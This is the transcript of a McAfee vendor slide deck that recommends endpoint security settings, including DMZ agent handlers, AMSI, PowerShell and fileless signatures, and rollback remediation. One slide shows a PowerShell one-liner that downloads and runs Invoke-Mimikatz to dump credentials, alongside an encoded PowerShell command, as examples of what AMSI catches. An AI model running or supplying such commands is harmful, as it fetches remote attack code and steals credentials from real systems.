mcafee 's top 10 endpoint optimization recommendations€¦ · sql port 1433 (ssl) agent handler...
TRANSCRIPT
-
McAfee CONFIDENTIAL
McAfee 's Top 10 endpoint optimization recommendations
Robert Lourenco – Regional presales specialist
-
2McAfee CONFIDENTIAL
Please note
While there are many variations of settings and configurations that will best suit different customers this document is to assist customers with frequently seen lack or misconfigurations of important protection controls. Assumptions are made that are the very least things like OAS is enabled, tamper protection and UI passwords are enabled and ENS is deployed.
This document is taken from experience with health checks at many customers and therefore does not include every possible recommended setting. For thorough investigations or checks of your environment against best practice or recommendations please seek to use McAfee professional services.
-
3McAfee CONFIDENTIAL
AGENDA
• Addressing work from home endpoint• ENS optimizations and configurations for better visibility or protection• ePO optimizations
Many customers running McAfee ePO and endpoint security have not made a few optimizations that will lead to a more secure environment with more visibility
-
4
Transition legacy datacenters to multi-cloud model for cost savings
and agility
Support Legacy Infrastructure and Application Services as
necessary
Support agile Dev Ops and Redesign critical business applications for the
cloud
Adopt Industrial IoT and leverage Data Analytics for more Business
Insights
Transition legacy IT Infrastructure supporting OT to the multi-cloud
enterprise Infrastructure
Risk and Resiliency Transformation Automation and efficacy
Enable flexibility in sharing and application use for maximum
productivity
Transition Office Services and Common Business Applications to
the cloud
Support a global, mobile workforce that enables productivity from the
office to the home to the hotel
Enable flexibility in sharing and application use for maximum
productivity
Transition Office Services and Common Business Applications to
the cloud
Support a global, mobile workforce that enables productivity from the
office to the home to the hotel
New ENS 10.7 features
Fileless detection & AMSI
Story Graph
Enable flexibility in sharing and application use for maximum
productivity
Transition Office Services and Common Business Applications to
the cloud
Support a global, mobile workforce that enables productivity from the
office to the home to the hotel
Increase Productivity and Innovation
Attract and Retain Talent
Increase sales and improve customer engagement
Enable flexibility in sharing and application use for maximum
productivity
Transition Office Services and Common Business Applications to
the cloud
Support a global, mobile workforce that enables productivity from the
office to the home to the hotel
Increased visibility and control
Work from home
New modelsSaaS/IaaS/PaaS
Support Legacy Infrastructure and Application Services as
necessary
Enable flexibility in sharing and application use for maximum
productivity
Transition Office Services and Common Business Applications to
the cloud
Support a global, mobile workforce that enables productivity from the
office to the home to the hotel
Increase Productivity and Innovation
Attract and Retain Talent
Increase sales and improve customer engagement
Enable flexibility in sharing and application use for maximum
productivity
Transition Office Services and Common Business Applications to
the cloud
Support a global, mobile workforce that enables productivity from the
office to the home to the hotel
Rollback remediation
ePO automations
ENS/TIE/ATD integrations and automation
Our customers value drivers
-
TransformationOrganizations are transforming with technology. Whether adopting the cloud, BYOD or IoT to transform the way they engage with customers, partners and/or employees, organizations bear risk as these technologies expand the attack surface. With McAfee, organizations can transform confidently leveraging security solutions purpose-built with transformation in mind, including those that secure every segment of the cloud and heterogenous device environments. And, we transform the nature of security itself with security-as-a-service consumption models.
-
Optimization 1: Addressing the work from home conundrum Endpoint visibility
-
7McAfee CONFIDENTIAL
Work from Home:Placing agent handlers in the DMZ
Benefits:
• Updated roaming users' policies and software
• Get roaming users' threat and client events
Positive results
• No VPN requirement
• WFH visibility
-
8McAfee CONFIDENTIAL
Baseline McAfee ePO Infrastructure with DMZ Agent handler
DMZ
McAfee® ePO™ Server
SQLMcAfee ePO
Console
Internet Agent Handler
DMZ Servers
SQL Port 1433 (SSL)
Agent Handler Port 443, 8443, 8444
Pull Software & UpdatesTCP Port 21/80 and 443
Laptops
Agent Port 443
Events UpstreamPolicies andClient Tasks down Port 443
MA 5.xPull Software & Updates Port 443
Internet
KEY POINTS
▪ Simple deployment
▪ Ease of management from a single console
▪ Ease of scalability
▪ Distributed definition updates
▪ Remote user support
-
Optimization 2: (TIE customers only)Addressing the work from home conundrum Remote TIE reputation capabilities
-
10McAfee CONFIDENTIAL
Work from Home:Placing DXL brokers in the DMZ (TIE customers)
Benefits:
• Run agent wake up calls to roaming users
• Apply DXL messages to roaming users
• Provide enterprise reputation protection from Threat intelligence exchange to roaming users
Positive results
• No VPN requirement
• WFH endpoint increased protection
-
11McAfee CONFIDENTIAL
Baseline McAfee® ePO™ Infrastructure with DMZ DXL broker
DMZ
McAfee®
ATD
McAfee® ePO™ Server
SQL
McAfee® TIE PrimaryDXL Broker
McAfee ePOConsole
Internet Agent Handler
DMZ Servers
DXL Broker
SQL Port 1433 (SSL)
Agent Handler Port 443, 8443, 8444
DXL Port 8883
MAPort 8081AH 443
Pull Software & UpdatesTCP Port 21/80 and 443
Laptops
DXLPort 8883+ ICMP
Events UpstreamPolicies andClient Tasks down Port 443
MA 5.xPull Software & Updates Port 443
DXL Port 8883+ 443
Internet
KEY POINTS
▪ Simple deployment
▪ Ease of management from a single console
▪ Ease of scalability
▪ Distributed definition updates
▪ Remote user support
-
Risk and ResiliencySecurity is about risk management. To fulfill this purpose, security professionals must speak the language of the boardroom. Yesterday’s security tools leave them blind to the risk, let alone able to communicate it. And, with regulations (like GDPR) upping the ante on the consequences of a breach, the stakes are getting higher. McAfee provides security solutions that offer visibility and control of data and assets across the attack surface, enabling organizations to meet compliance requirements, protect intellectual property and manage financial and reputational risk.
-
McAfee Confidentiality Language
ENS 10.7
-
14McAfee CONFIDENTIAL
For customers still have not upgraded to ENS 10.7
• Best performing ENS to date with all the additional features
• Most stable ENS release to date
• Multiple new enhancements
-
ENS | Detection Technology per Version
Endpoint Security Capabilities Summary
Detection Technology ENS 10.5.5 ENS 10.5.5 ENS 10.6.1 ENS 10.7
Threat Prevention l l l l
Adaptive Threat Prevention l l l
Signature & Heuristic Engine (convicting the majority of known malware) l l l l
Global Threat Intelligence (cloud-based reputation for some known malware detections & up-to-the-minute updates)
l l l l
Attack Surface Reduction (using Exploit Prevention rules) l l l l
Threat Intelligence Exchange (internal reputation source with unknown files automatically sent to ATD sandbox for analysis)
l l l
Process Containment (Dynamic Application Containment ) l l l
Static and Dynamic machine learning (Using Real Protect) l l l
File-based and fileless script attack signature detection (using Microsoft Anti-Malware Script Interface or AMSI)
l l
Attack Behavior Blocking (Using Adaptive Threat Prevention rules with Process Tree Knowledge)
l
File-based and fileless script attack machine learning detection (using Microsoft Anti-Malware Script Interface on Windows 10 and Windows 7 with PowerShell 5.0)
l
Roll-back of file and registry changes including encrypted files (using Enhanced Remediation)
l
Story Graph to illustrate the flow and activities associated with an attack, (from launch to conviction)
l
-
McAfee Confidentiality Language
Optimization 3:
ENS AMSI
-
Have you enabled AMSI (Antimalware Scan interface)?
McAfee AMSI integration protects against malicious scripts. Scripts in vbscript or PowerShell can be obfuscated. With AMSI support ENS will de-obfuscate the scripts and ensure no malware is running and file-less malware can affect the system.
This setting may not be enabled by default or could be placed in observe mode only which will create events but not block the malicious scripts from running.
This setting can be found in the ENS ATP options policy under real protect scanning:
-
IEX (New-Object System.Net.Webclient).DownloadString(‘https://git.com/***/Invoke-Mimikatz.ps1’) ; Invoke-Mimikatz -DumpCreds
18
WithMcAfee FilelessThreat Protection
POWERSHELL.EXE -ENCODEDCOMMAND SQBGACGAJABQAFMAVGBLAFIAUWBJAAYG
McAfee with AMSI Support
CMD
Scripting Engine
-
McAfee Confidentiality Language
Optimization 4:
ENS Exploit prevention –PowerShell signatures
-
Do you have PowerShell visibility or protection?McAfee ENS exploit prevention contains signatures for PowerShell monitoring and control.
This setting may not be enabled by default. At a minimum for visibility for endpoint and SOC teams enable important ones for reporting if not blocking. Visibility on encoded, hidden, policy bypass and many others are important for monitoring and detection of malware or malicious use of systems.
This setting can be found in the ENS exploit prevention policy under signatures
-
McAfee Confidentiality Language
Optimization 5:
ENS Exploit prevention –Fileless signatures
-
Are Fileless signatures enabledMcAfee ENS exploit prevention contains signatures for Fileless threat monitoring and control.
This setting may not be enabled by default. At a minimum for visibility for endpoint and SOC teams enable important ones for reporting if not blocking. Visibility on fileless threats are important for monitoring and detection of malware or malicious use of systems.
This setting can be found in the ENS exploit prevention policy under signatures
-
McAfee Confidentiality Language
Optimization 6:
ENS Exploit prevention –Network intrusion prevention
-
Can you see port scanning and other networkIntrusions between endpoints that don’t transverse network devices like IPS or FW’s?
This setting may not be enabled by default. ENS can detect network port scans and other network intrusions with the network intrusion prevention capabilities.
This setting can be found in the ENS exploit prevention policy Network Intrusion prevention
-
McAfee Confidentiality Language
Optimization 7:
ENS – Ensure GTI is enabled
-
Is GTI enabled?
• Make sure GTI is enabledEnsure the systems can reach GTI through DNS. If the customer has split DNS architecture. Then they need to do some changes to benefit from GTI for the ENS TP
•https://kc.mcafee.com/corporate/index?page=content&id=KB53782
https://kc.mcafee.com/corporate/index?page=content&id=KB53782
-
Automation & EfficacySecurity is awash in complexity. Sophisticated attacks are increasing, the vendor landscape is too complex, too many security products operate in isolation and there are too few employees to address the challenge. McAfee addresses the need by giving customers the best of both worlds: an open approach that offers competitive choice while simplifying operations; a mix of threat and artificial intelligence to maximize efficacy and minimize false positives; and solutions that team humans with machines to address both the sophistication and volume of threats.
-
McAfee Confidentiality Language
Optimization 8:
Effective client tasks
-
A Client deployment task should be created at the top level of the system tree and deployed to all systems that require protection.
A task to run immediately should be created to ensure as soon as a system has a McAfee agent deployed to it that it deploys ENS and ENS components automatically. This reduces the time systems are unprotected
A daily task should also be setup to ensure any systems that didn’t complete the immediate task for any reason will be caught by this daily task
-
Product Deployment & Maintenance
Situation
• When managing large numbers of systems within a complex environment, some of these systems will inevitably not be running the desired products and versions of software
Desired Outcome
• To maximise the numbers of systems running the desired products and versions of software
-
Product Deployment & Maintenance
The objective is to ensure Endpoint Security is installed and up to date from a product perspective, i.e.
• An endpoint is running the latest versions of each Endpoint Security module
• It is not concerned with content (Engine or DAT installed)
Detailed Objectives
1. Identify systems that are out of compliance
2. Configure easy identification of non-compliant systems within System Tree
3. Configure shorter reporting interval (ASCI) for non-compliant systems
4. For systems that do not have any version installed run a deployment task
5. For systems that have an out of date version run an update task
6. Remove identification and shorter reporting interval for compliant systems
Objectives & workflow
-
Use of tags with product deployment and maintenance
• Tags
• NO ENS: One or more ENS modules is not installed
• BAD ENS: One or more ENS modules is out of date
• Only one or other or neither should be applied at one time
Note use of simple short names – these can easily be viewed in the system tree.
Remember other tags may be present if automation is used extensively
• How to assign tags? Some considerations:
• Tag assignment should be automatic (admin should not need to assign tags)
• Tags removal should be automatic too (i.e. tags only present if condition is true)
• ENS consist of multiple modules, so multiple version checks are required, (e.g. Platform, Threat Prevention, Firewall, Web Control, Adaptive Threat Prevention)
• Process should be as simple as possible to maintain, (e.g. when a new version of ENS is released and version numbers of all modules need to change)
-
McAfee Confidentiality Language
Optimization 9:
System tree sorting
-
System tree sorting
Situation
• When managing large numbers of systems within a complex environment, systems need to automatically move into the correct groups so they have the right policies applied for the type of system they are or location they presenting at.
Desired Outcome
• To ensure systems are always placed in the correct group to get the correct policies.
-
System tree sorting - configuration
First check server settings
• Under configuration → server setting → system tree sorting. To have systems sort on eachagent to server communication ensure its enabled
Check if systems have sorting enabled in the system tree• You may need to add the system tree sorting column
-
System tree sorting - configuration
Check if sorting is enabled on Active directory synchronization agent deployment
• Under System tree → group details → synchronization type → Push Agent →
And ensure sorting criteria is setup by IP or TAG. Systems will move to the correct groups based on IP or TAG or a combination of the 2.• Under System tree → group details → sorting criteria
-
McAfee Confidentiality Language
Optimization 10:
ENS 10.7 – roll back
-
38McAfee Confidential
Rollback Remediation
How it works:
Automatically returns systems to a healthy state
Malware attempts to compromise an endpoint:
• Filenames altered• Executables are called on to
grant access to the system• Payload is delivered, system
is compromised
• System snapshot is established• Records changes made to files,
permission changes and other malicious actions
• ENS detects threats through known methods, behavioral analysis or global threat intelligence
• Rollback remediation is triggered by administrative policies
• System changes are reversed and system returns to a healthy state
Users remain productive, administrators regain time otherwise spent on manual repair or reimaging
-
39McAfee Confidential
ENS 10.7 ATP – Enable enhanced remediation
To enable roll back
• Under the ENS ATP policies → options → action enforcement